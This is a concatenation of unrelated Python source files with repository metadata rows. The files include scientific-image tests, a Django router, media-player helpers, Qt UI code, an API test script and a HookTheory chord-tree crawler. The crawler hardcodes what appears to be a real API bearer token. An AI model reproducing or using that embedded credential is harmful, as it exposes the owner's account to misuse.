x_body_val = np.load(main_numpy_dir + 'X_train/x_body_val.npy')
y_image_val = np.load(main_numpy_dir + 'Y_train/y_val.npy')
y_body_val = np.load(main_numpy_dir + 'Y_train/y_val.npy')
x_image_test = np.load(main_numpy_dir + 'X_train/x_image_test.npy')
x_body_test = np.load(main_numpy_dir + 'X_train/x_body_test.npy')
y_image_test = np.load(main_numpy_dir + 'Y_train/y_test.npy')
y_body_test = np.load(main_numpy_dir + 'Y_train/y_test.npy')
print('[INFO] Data have been successfully loaded')
print('---------------------------------------------------------------------------------------------------')
if verbose == 1:
print('x_image_train shape:', x_image_train.shape)
print('x_body_train shape:', x_body_train.shape)
print('y_image_train shape:', y_image_train.shape)
print('y_body_train shape:', y_body_train.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_image_val shape:', x_image_val.shape)
print('x_body_val shape:', x_body_val.shape)
print('y_image_val shape:', y_image_val.shape)
print('y_body_val shape:', y_body_val.shape)
print ('---------------------------------------------------------------------------------------------------')
print('x_image_test shape:', x_image_test.shape)
print('x_body_test shape:', x_body_test.shape)
print('y_image_test shape:', y_image_test.shape)
print('y_body_test shape:', y_body_test.shape)
print ('---------------------------------------------------------------------------------------------------')
return (x_image_train, x_body_train,y_image_train,y_body_train), \
(x_image_val, x_body_val, y_image_val,y_body_val), \
(x_image_test, x_body_test,y_image_test,y_body_test)
| 46.369697 | 180 | 0.656385 | 1,038 | 7,651 | 4.378613 | 0.05973 | 0.075248 | 0.10033 | 0.118812 | 0.445325 | 0.40484 | 0.40484 | 0.384378 | 0.384378 | 0.267547 | 0 | 0.000612 | 0.14534 | 7,651 | 164 | 181 | 46.652439 | 0.694449 | 0.044177 | 0 | 0.163265 | 0 | 0 | 0.361466 | 0.230685 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.020408 | 0 | 0.061224 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
1df523cdc41ccb402483976f0573983b6122d8e9 | 4,412 | py | Python | tests/test_vims_pixel.py | seignovert/pyvims | a70b5b9b8bc5c37fa43b7db4d15407f312a31849 | [
"BSD-3-Clause"
] | 4 | 2019-09-16T15:50:22.000Z | 2021-04-08T15:32:48.000Z | tests/test_vims_pixel.py | seignovert/pyvims | a70b5b9b8bc5c37fa43b7db4d15407f312a31849 | [
"BSD-3-Clause"
] | 3 | 2018-05-04T09:28:24.000Z | 2018-12-03T09:00:31.000Z | tests/test_vims_pixel.py | seignovert/pyvims | a70b5b9b8bc5c37fa43b7db4d15407f312a31849 | [
"BSD-3-Clause"
] | 1 | 2020-10-12T15:14:17.000Z | 2020-10-12T15:14:17.000Z | """Test VIMS image module."""
from numpy.testing import assert_array_almost_equal as assert_array
from pytest import approx, fixture, raises
from pyvims import VIMS
from pyvims.errors import VIMSError
@fixture
def img_id():
"""Testing image ID."""
return '1731456416_1'
@fixture
def cube(img_id):
"""Testing cube."""
return VIMS(img_id)
@fixture
def pixel(cube):
"""Testing pixel (ground and specular)."""
return cube[6, 32]
@fixture
def limb_pixel(cube):
"""Testing limb pixel."""
return cube[1, 1]
def test_pixel_err(cube):
"""Test VIMS pixel errors."""
# Invalid sample value
with raises(VIMSError):
_ = cube[0, 1]
with raises(VIMSError):
_ = cube[100, 1]
with raises(TypeError):
_ = cube[1.1, 1]
# Invalid line value
with raises(VIMSError):
_ = cube[1, 0]
with raises(VIMSError):
_ = cube[1, 100]
with raises(TypeError):
_ = cube[1, 1.1]
def test_pixel_properties(pixel):
"""Test VIMS pixel properties (ground and specular)."""
assert pixel == '1731456416_1-S6_L32'
assert pixel != '1731456416_1-S6_L33'
assert pixel.s == 6
assert pixel.l == 32
assert pixel.i == 6 - 1
assert pixel.j == 32 - 1
assert pixel[352] == pixel @ 5.13 == pixel['5.13'] == pixel @ '352'
assert pixel[339:351] == pixel @ '4.91:5.11' == approx(0.162, abs=1e-3)
assert pixel.et == approx(406035298.3, abs=.1)
assert_array(pixel.j2000, [0.7299, 0.3066, -0.6109], decimal=4)
assert pixel.ra == approx(22.79, abs=1e-2)
assert pixel.dec == approx(-37.66, abs=1e-2)
assert pixel.lon == -pixel.lon_e == approx(136.97, abs=1e-2)
assert pixel.lat == approx(80.37, abs=1e-2)
assert pixel.alt == approx(0, abs=1e-2)
assert not pixel.limb
assert pixel.ground
assert pixel.slon == '137°W'
assert pixel.slat == '80°N'
assert pixel.salt == '0 km (Ground pixel)'
assert pixel.inc == approx(67.1, abs=.1)
assert pixel.eme == approx(64.4, abs=.1)
assert pixel.phase == approx(131.5, abs=.1)
assert_array(pixel.sc, [12.25, 31.96], decimal=2)
assert_array(pixel.ss, [185.00, 16.64], decimal=2)
assert pixel.dist_sc == approx(211868.6, abs=.1)
assert pixel.res_s == pixel.res_l == pixel.res == approx(104.9, abs=.1)
assert pixel.is_specular
assert pixel.specular_lon == approx(141.2, abs=.1)
assert pixel.specular_lat == approx(79.25, abs=.1)
assert pixel.specular_angle == approx(65.77, abs=.1)
assert pixel.specular_dist == approx(60.8, abs=.1)
assert len(pixel.spectrum) == len(pixel.wvlns)
assert pixel.wvlns[0] == approx(0.892, abs=1e-3)
assert pixel.spectrum[0] == approx(0.156, abs=1e-3)
def test_limb_pixel_properties_limb(limb_pixel):
"""Test VIMS limb pixel properties (not specular)."""
assert str(limb_pixel) == '1731456416_1-S1_L1'
assert limb_pixel.s == 1
assert limb_pixel.l == 1
assert limb_pixel.i == 0
assert limb_pixel.j == 0
assert limb_pixel.et == approx(406034072.7, abs=.1)
assert_array(limb_pixel.j2000, [0.7384, 0.2954, -0.6062], decimal=4)
assert limb_pixel.ra == approx(21.81, abs=1e-2)
assert limb_pixel.dec == approx(-37.31, abs=1e-2)
assert limb_pixel.lon == approx(251.01, abs=1e-2)
assert limb_pixel.lat == approx(41.17, abs=1e-2)
assert limb_pixel.alt == approx(1893.58, abs=1e-2)
assert limb_pixel.limb
assert not limb_pixel.ground
assert limb_pixel.slon == '109°E'
assert limb_pixel.slat == '41°N'
assert limb_pixel.salt == '1894 km (Limb pixel)'
assert limb_pixel.inc == approx(61.4, abs=.1)
assert limb_pixel.eme == approx(90.0, abs=.1)
assert limb_pixel.phase == approx(131.7, abs=.1)
assert limb_pixel.dist_sc == approx(219698.4, abs=.1)
assert limb_pixel.res == approx(108.7, abs=.1)
assert not limb_pixel.is_specular
def test_pixel_properties_err(pixel):
"""Test VIMS pixel properties errors."""
# Band invalid
with raises(VIMSError):
_ = pixel[1]
with raises(VIMSError):
_ = pixel[353]
# Wavelength invalid
with raises(VIMSError):
_ = pixel @ .5
with raises(VIMSError):
_ = pixel @ 6.
# Invalid index
with raises(VIMSError):
_ = pixel @ (1, 2, 3)
def test_pixel_plot(pixel):
"""Test pixel plot."""
pixel.plot(title='testing')
| 26.739394 | 75 | 0.635086 | 678 | 4,412 | 4.023599 | 0.225664 | 0.120968 | 0.104472 | 0.043988 | 0.273094 | 0.072214 | 0.019062 | 0 | 0 | 0 | 0 | 0.106358 | 0.215775 | 4,412 | 164 | 76 | 26.902439 | 0.680925 | 0.084542 | 0 | 0.147059 | 0 | 0 | 0.037149 | 0 | 0 | 0 | 0 | 0 | 0.578431 | 1 | 0.088235 | false | 0 | 0.039216 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1df8beec4fea3bcefebf61482d69a744dbb216ea | 302 | py | Python | apistar/exceptions.py | sylwekb/apistar | 890006884dbb9644824511e0275fa00515204c5b | [
"BSD-3-Clause"
] | null | null | null | apistar/exceptions.py | sylwekb/apistar | 890006884dbb9644824511e0275fa00515204c5b | [
"BSD-3-Clause"
] | null | null | null | apistar/exceptions.py | sylwekb/apistar | 890006884dbb9644824511e0275fa00515204c5b | [
"BSD-3-Clause"
] | null | null | null | class SchemaError(Exception):
def __init__(self, schema, code):
self.schema = schema
self.code = code
msg = schema.errors[code].format(**schema.__dict__)
super().__init__(msg)
class NoCurrentApp(Exception):
pass
class ConfigurationError(Exception):
pass
| 20.133333 | 59 | 0.65894 | 32 | 302 | 5.84375 | 0.5 | 0.106952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.231788 | 302 | 14 | 60 | 21.571429 | 0.806034 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.2 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1dfaf8dad72aefecc4b8134cc8efce48a3d16816 | 288 | py | Python | pyslam/thirdparty/disk/submodules/torch-dimcheck/setup.py | dysdsyd/VO_benchmark | a7602edab934419c1ec73618ee655e18026f834f | [
"Apache-2.0"
] | 2 | 2021-09-11T09:13:31.000Z | 2021-11-03T01:39:56.000Z | pyslam/thirdparty/disk/submodules/torch-dimcheck/setup.py | dysdsyd/VO_benchmark | a7602edab934419c1ec73618ee655e18026f834f | [
"Apache-2.0"
] | null | null | null | pyslam/thirdparty/disk/submodules/torch-dimcheck/setup.py | dysdsyd/VO_benchmark | a7602edab934419c1ec73618ee655e18026f834f | [
"Apache-2.0"
] | null | null | null | from setuptools import setup
setup(
name='torch-dimcheck',
version='0.0.1',
description='Dimensionality annotations for tensor parameters and return values',
packages=['torch_dimcheck'],
author='Michał Tyszkiewicz',
author_email='michal.tyszkiewicz@gmail.com',
)
| 26.181818 | 85 | 0.725694 | 33 | 288 | 6.272727 | 0.818182 | 0.125604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012346 | 0.15625 | 288 | 10 | 86 | 28.8 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0.503472 | 0.097222 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1dfd962e97e4b42a0882e32bbba5a65998278c73 | 263 | py | Python | task_management/urls.py | AbdelrahmanRabiee/ayenapp | 43fc4f2b5f53ca308cf60c9f1d74cb2e3f4f4b25 | [
"MIT"
] | null | null | null | task_management/urls.py | AbdelrahmanRabiee/ayenapp | 43fc4f2b5f53ca308cf60c9f1d74cb2e3f4f4b25 | [
"MIT"
] | 5 | 2020-06-06T01:47:05.000Z | 2022-02-10T14:05:22.000Z | task_management/urls.py | AbdelrahmanRabiee/ayenapp | 43fc4f2b5f53ca308cf60c9f1d74cb2e3f4f4b25 | [
"MIT"
] | null | null | null | from django.urls import path
from rest_framework import routers
from task_management import viewsets
app_name = "task_management"
urlpatterns = [
]
task_router = routers.SimpleRouter()
task_router.register(r'tasks', viewsets.TasksViewSet, base_name='tasks') | 18.785714 | 72 | 0.802281 | 34 | 263 | 6 | 0.617647 | 0.137255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114068 | 263 | 14 | 72 | 18.785714 | 0.875536 | 0 | 0 | 0 | 0 | 0 | 0.094697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
38005601c897e3e947cdabb62140e650a9ec4e7f | 1,473 | py | Python | audtool/__init__.py | Guaxinim5573/audacious-player | 7bcd2afdd91bb18a41fb70500aaf76eaa17da837 | [
"MIT"
] | null | null | null | audtool/__init__.py | Guaxinim5573/audacious-player | 7bcd2afdd91bb18a41fb70500aaf76eaa17da837 | [
"MIT"
] | 1 | 2021-11-29T16:25:22.000Z | 2021-11-29T16:25:22.000Z | audtool/__init__.py | Guaxinim5573/audacious-player | 7bcd2afdd91bb18a41fb70500aaf76eaa17da837 | [
"MIT"
] | null | null | null | import subprocess
import logging
logger = logging.getLogger(__name__)
# Run a command line command and returns stdout
def _run(command):
result = subprocess.run(command, check=True, stdout=subprocess.PIPE, text=True)
result.stdout = result.stdout[:-1]
return result.stdout
def is_playing():
result = subprocess.run(["audtool", "playback-status"], stdout=subprocess.PIPE, text=True)
logger.debug(result.stdout)
if result.returncode == 0 and result.stdout is not None and result.stdout != "stopped":
return True
return False
def status():
return _run(["audtool", "playback-status"])
# Get current song
def get_current_song():
return _run(["audtool", "current-song"])
# Skip to next song
def next():
_run(["audtool", "playlist-advance"])
_run(["audtool", "playback-play"])
def prev():
_run(["audtool", "playlist-reverse"])
_run(["audtool", "playback-play"])
def volume(amount):
_run(["audtool", "set-volume", amount])
def playpause():
_run(["audtool", "playback-playpause"])
# Display all songs in current playlist
def display_songs():
lines = _run(["audtool", "playlist-display"]).splitlines()
lines.pop() # Removes last item, whe don't need that
lines.pop(0) # We also don't need the first item
songs = []
for line in lines:
[pos, name, length] = line.split(" | ")
pos = pos.lstrip()
name = name.rstrip()
songs.append({"name": name, "pos": pos, "length": length})
return songs
def jump(pos):
_run(["audtool", "playlist-jump", pos]) | 26.781818 | 91 | 0.697895 | 201 | 1,473 | 5.019901 | 0.378109 | 0.109019 | 0.089197 | 0.047572 | 0.105055 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002358 | 0.136456 | 1,473 | 55 | 92 | 26.781818 | 0.790881 | 0.129667 | 0 | 0.05 | 0 | 0 | 0.201411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.05 | 0.05 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3800ef2480e2344c284a3ea135e2ec8a35e84cfa | 3,377 | py | Python | GiftUi.py | DrPleaseRespect/GiftBox | d39b3b644aa579297315ee3b3cb38c79556682f9 | [
"MIT"
] | null | null | null | GiftUi.py | DrPleaseRespect/GiftBox | d39b3b644aa579297315ee3b3cb38c79556682f9 | [
"MIT"
] | null | null | null | GiftUi.py | DrPleaseRespect/GiftBox | d39b3b644aa579297315ee3b3cb38c79556682f9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'GiftUi.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
import Resources_rc
class Ui_Form(object):
def setupUi(self, Form):
if not Form.objectName():
Form.setObjectName(u"Form")
Form.resize(373, 261)
sizePolicy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())
Form.setSizePolicy(sizePolicy)
Form.setMinimumSize(QSize(373, 261))
Form.setMaximumSize(QSize(373, 261))
self.gridLayout = QGridLayout(Form)
self.gridLayout.setObjectName(u"gridLayout")
self.verticalLayout_2 = QVBoxLayout()
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.label = QLabel(Form)
self.label.setObjectName(u"label")
sizePolicy1 = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy1)
self.label.setMinimumSize(QSize(200, 200))
self.label.setMaximumSize(QSize(200, 200))
self.label.setSizeIncrement(QSize(100, 100))
self.label.setBaseSize(QSize(100, 100))
self.label.setTextFormat(Qt.RichText)
self.label.setPixmap(QPixmap(u":/GiftIcon/gifticon.png"))
self.label.setScaledContents(True)
self.label.setAlignment(Qt.AlignCenter)
self.label.setMargin(23)
self.label.setIndent(-1)
self.horizontalLayout.addWidget(self.label)
self.label_2 = QLabel(Form)
self.label_2.setObjectName(u"label_2")
self.label_2.setScaledContents(False)
self.label_2.setAlignment(Qt.AlignCenter)
self.horizontalLayout.addWidget(self.label_2)
self.horizontalSpacer = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(self.horizontalSpacer)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.pushButton = QPushButton(Form)
self.pushButton.setObjectName(u"pushButton")
self.verticalLayout_2.addWidget(self.pushButton)
self.gridLayout.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
self.retranslateUi(Form)
QMetaObject.connectSlotsByName(Form)
# setupUi
def retranslateUi(self, Form):
Form.setWindowTitle(QCoreApplication.translate("Form", u"Form", None))
self.label.setText("")
self.label_2.setText(QCoreApplication.translate("Form", u"Happy Birthday!!", None))
self.pushButton.setText(QCoreApplication.translate("Form", u"Open Gift!", None))
# retranslateUi
| 37.522222 | 95 | 0.665976 | 336 | 3,377 | 6.64881 | 0.342262 | 0.08863 | 0.026858 | 0.040286 | 0.102954 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030094 | 0.183299 | 3,377 | 89 | 96 | 37.94382 | 0.779913 | 0.066035 | 0 | 0 | 1 | 0 | 0.044646 | 0.007721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033898 | false | 0 | 0.067797 | 0 | 0.118644 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3801139345c9a4ae91e8d3ae8ff7f84beeaa380a | 251 | py | Python | telegram_coin_bot/__init__.py | sigmaister/telegram-coin-bot | b14329de8fc86cb135f05d7207f64a00f349cabf | [
"MIT"
] | 17 | 2020-07-17T18:55:27.000Z | 2021-11-20T03:54:01.000Z | telegram_coin_bot/__init__.py | sigmaister/telegram-coin-bot | b14329de8fc86cb135f05d7207f64a00f349cabf | [
"MIT"
] | 5 | 2020-07-17T19:23:06.000Z | 2020-08-11T12:45:14.000Z | telegram_coin_bot/__init__.py | sigmaister/telegram-coin-bot | b14329de8fc86cb135f05d7207f64a00f349cabf | [
"MIT"
] | 10 | 2020-07-17T19:01:40.000Z | 2021-12-18T13:21:55.000Z | __author__ = "Wild Print"
__maintainer__ = __author__
__email__ = "telegram_coin_bot@rambler.ru"
__license__ = "MIT"
__version__ = "0.0.1"
__all__ = (
"__author__",
"__email__",
"__license__",
"__maintainer__",
"__version__",
)
| 15.6875 | 42 | 0.669323 | 23 | 251 | 5.130435 | 0.695652 | 0.186441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014778 | 0.191235 | 251 | 15 | 43 | 16.733333 | 0.566502 | 0 | 0 | 0 | 0 | 0 | 0.40239 | 0.111554 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
38028042957e1e98ecf41fea1079a9cdbc4aaca9 | 3,200 | py | Python | tests/backend/message.py | IronMeerkat/genesis | 4a053ae4639a12295be9951905ca69383c1da860 | [
"MIT"
] | null | null | null | tests/backend/message.py | IronMeerkat/genesis | 4a053ae4639a12295be9951905ca69383c1da860 | [
"MIT"
] | null | null | null | tests/backend/message.py | IronMeerkat/genesis | 4a053ae4639a12295be9951905ca69383c1da860 | [
"MIT"
] | null | null | null | import test_agent
print('Logging in')
Meerkat = test_agent.TestAgent(username='meerkat', password='12345678', endpoint='/messages/')
Pangolin = test_agent.TestAgent(username='pangolin', password='12345678', endpoint='/messages/')
Badger = test_agent.TestAgent(username='badger', password='12345678', endpoint='/messages/')
Anon = test_agent.TestAgent(endpoint='/messages/')
print("Meerkat sending message to Pangolin")
meerkat_sent_message = Meerkat.post(recepient='pangolin', title="Hello Pangolin", body="It's me, Meerkat")
assert meerkat_sent_message.status_code == 201, f'Failed to send message. code: {meerkat_sent_message.status_code}'
print("Checking meerkat's mailboxes")
meerkat_mailbox = Meerkat.get()
assert meerkat_mailbox.json() == [], "Meerkat can see a message"
meerkat_outgoing = Meerkat.get('sender')
assert len(meerkat_outgoing.json()) == 1, "Meerkat can's see an outgoing message'"
msg_id = meerkat_outgoing.json()[0]['id']
print("Meerkat's mailboxes passed the initial message test")
print("Checking Pangolin's mailboxes")
pangolin_read_mailbox = Pangolin.get('read')
assert pangolin_read_mailbox.json() == [], "read messages showed up in Pangolin's mailbox"
pangolin_outgoing = Pangolin.get('sender')
assert pangolin_outgoing.json() == [], "Pangolin appears to have an outgoing message"
pangoling_mailbox = Pangolin.get()
assert int(pangoling_mailbox.json()[0]['id']) == msg_id, "No matching message in pangolin's inbox"
message = Pangolin.get(f'{msg_id}').json()
assert message['title'] == "Hello Pangolin" and message['body'] == "It's me, Meerkat", 'Wrong message found'
pangolin_read_mailbox = Pangolin.get('read')
assert len(pangolin_read_mailbox.json()) == 1, "Message not found in read"
print("Pangolin succesfully passed the initial message test")
print("Ensuring Badger is unable to access message")
badger_mail = Badger.get('all')
assert badger_mail.json() == [], "Badger has mail"
badger_message = Badger.get(f'{msg_id}')
assert badger_message.status_code >= 400, 'Badger gained unauthorozed access'
print("Badger succesfully passed the initial message test")
print("Ensuring Anon is unable to access message")
anon_mail = Anon.get()
assert anon_mail.status_code >= 400, "Anon can see a mailbox"
anon_message = Anon.get(f'{msg_id}')
assert anon_message.status_code >= 400, "Anon can see meerkat's message"
print("Anon passed test")
print('Pangolin deleting message')
deletion = Pangolin.delete(f'{msg_id}')
assert deletion.status_code == 204, "failed to delete"
pangolin_read_mailbox = Pangolin.get('read')
print(pangolin_read_mailbox.json())
assert pangolin_read_mailbox.json() == [], "read messages showed up in Pangolin's mailbox"
pangolin_deleted = Pangolin.get('deleted')
assert len(pangolin_deleted.json()) == 1, "Deleted message does not show up"
print('Pangolin succesfully deleted messages')
print("Ensuring meerkat can still see message")
meerkat_outgoing = Meerkat.get('sender')
assert len(meerkat_outgoing.json()) == 1, "Meerkat can's see an outgoing message'"
meerkat_outgoing = Meerkat.get('deleted')
assert meerkat_outgoing.json() == [], "Meerkat sees deleted message"
print('Meerkat can succesfully see message pangolin deleted as non-deleted') | 50 | 115 | 0.763438 | 445 | 3,200 | 5.355056 | 0.202247 | 0.044062 | 0.055812 | 0.038607 | 0.345363 | 0.266051 | 0.219052 | 0.187998 | 0.145195 | 0.145195 | 0 | 0.015647 | 0.10125 | 3,200 | 64 | 116 | 50 | 0.812935 | 0 | 0 | 0.163636 | 0 | 0 | 0.413933 | 0.010622 | 0 | 0 | 0 | 0 | 0.309091 | 1 | 0 | false | 0.127273 | 0.018182 | 0 | 0.018182 | 0.272727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3808406b3ee798849fbc2399203409d6b196a582 | 1,503 | py | Python | server/tree_gen/tree_gen.py | patrickferner/Lo-Finity | 406531106277c2ad3422518e8beb39b1c3fa53f3 | [
"MIT"
] | 1 | 2021-06-14T14:41:36.000Z | 2021-06-14T14:41:36.000Z | server/tree_gen/tree_gen.py | Jorbeatz/Lo-Finity | 406531106277c2ad3422518e8beb39b1c3fa53f3 | [
"MIT"
] | null | null | null | server/tree_gen/tree_gen.py | Jorbeatz/Lo-Finity | 406531106277c2ad3422518e8beb39b1c3fa53f3 | [
"MIT"
] | 1 | 2019-07-22T21:45:10.000Z | 2019-07-22T21:45:10.000Z | import requests
import json
import pdb
import time
#url_string = "https://api.hooktheory.com/v1/trends/nodes?cp=1"
response = requests.get("https://api.hooktheory.com/v1/trends/nodes?cp=1", headers={'Authorization': "Bearer 0449bff346d2609ac119bfb7d290e9bb"})
hook_result = json.loads(response.text)
json_result = {}
chord_ID = "1"
json_result[1] = {"prob": [], "child": []}
d_limit = 4
def build_json(current, depth, url_string):
# if depth is d_limit:
# return
global chord_ID
global hook_result
global response
index = 0
if depth != 0:
url_string = url_string + "," + chord_ID
print(url_string)
response = requests.get(url_string, headers={'Authorization': "Bearer 0449bff346d2609ac119bfb7d290e9bb"})
hook_result = json.loads(response.text)
time.sleep(2)
print("Called API Depth " + str(depth))
for obj in hook_result[:4]:
probability = obj["probability"]
chord_ID = obj["chord_ID"].encode("ascii")
current["prob"].append(probability)
current["child"].append({chord_ID: {}})
if chord_ID is '1' or depth is d_limit:
return
current["child"][index][chord_ID] = {"prob": [], "child": []}
build_json(current["child"][index][chord_ID], depth+1, url_string)
index += 1
current = json_result[1]
build_json(current, 0, 'https://api.hooktheory.com/v1/trends/nodes?cp=1')
print json_result
with open('chord_tree.json', 'w') as outfile:
json.dump(json_result, outfile) | 28.903846 | 144 | 0.667332 | 202 | 1,503 | 4.806931 | 0.311881 | 0.064882 | 0.055613 | 0.064882 | 0.3862 | 0.297631 | 0.297631 | 0.297631 | 0.297631 | 0.183316 | 0 | 0.045603 | 0.182967 | 1,503 | 52 | 145 | 28.903846 | 0.745114 | 0.05988 | 0 | 0.054054 | 0 | 0 | 0.209072 | 0.045358 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.108108 | null | null | 0.081081 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
380d0996fe02d82d90603eefc1f9b3eea03168d3 | 666 | py | Python | examples/hover_example.py | kail85/mpldatacursor | 2df44a3912c2684b2d66fadc7cacbb9f60a15186 | [
"MIT"
] | 165 | 2015-01-09T03:48:50.000Z | 2022-03-16T03:25:23.000Z | examples/hover_example.py | kail85/mpldatacursor | 2df44a3912c2684b2d66fadc7cacbb9f60a15186 | [
"MIT"
] | 87 | 2015-02-09T11:17:49.000Z | 2022-01-04T02:48:00.000Z | examples/hover_example.py | kail85/mpldatacursor | 2df44a3912c2684b2d66fadc7cacbb9f60a15186 | [
"MIT"
] | 46 | 2015-01-13T00:59:18.000Z | 2022-03-03T12:46:40.000Z | """
Demonstrates the hover functionality of mpldatacursor as well as point labels
and a custom formatting function. Notice that overlapping points have both
labels displayed.
"""
import string
import matplotlib.pyplot as plt
import numpy as np
from mpldatacursor import datacursor
np.random.seed(1977)
x, y = np.random.random((2, 26))
labels = string.ascii_lowercase
fig, ax = plt.subplots()
ax.scatter(x, y, s=200)
ax.set_title('Mouse over a point')
# Show only the point label and allow nicer formatting if points overlap
formatter = lambda **kwargs: ', '.join(kwargs['point_label'])
datacursor(hover=True, formatter=formatter, point_labels=labels)
plt.show()
| 27.75 | 77 | 0.771772 | 100 | 666 | 5.1 | 0.62 | 0.043137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017271 | 0.130631 | 666 | 23 | 78 | 28.956522 | 0.863558 | 0.363363 | 0 | 0 | 0 | 0 | 0.074519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
38188123fc74067b2382c0edf77f410238662bfd | 1,040 | py | Python | bf_smb_tmux.py | BadNameException/SambaBF | 7421ac1d821807ffc565b7b5b466c85084343fb9 | [
"MIT"
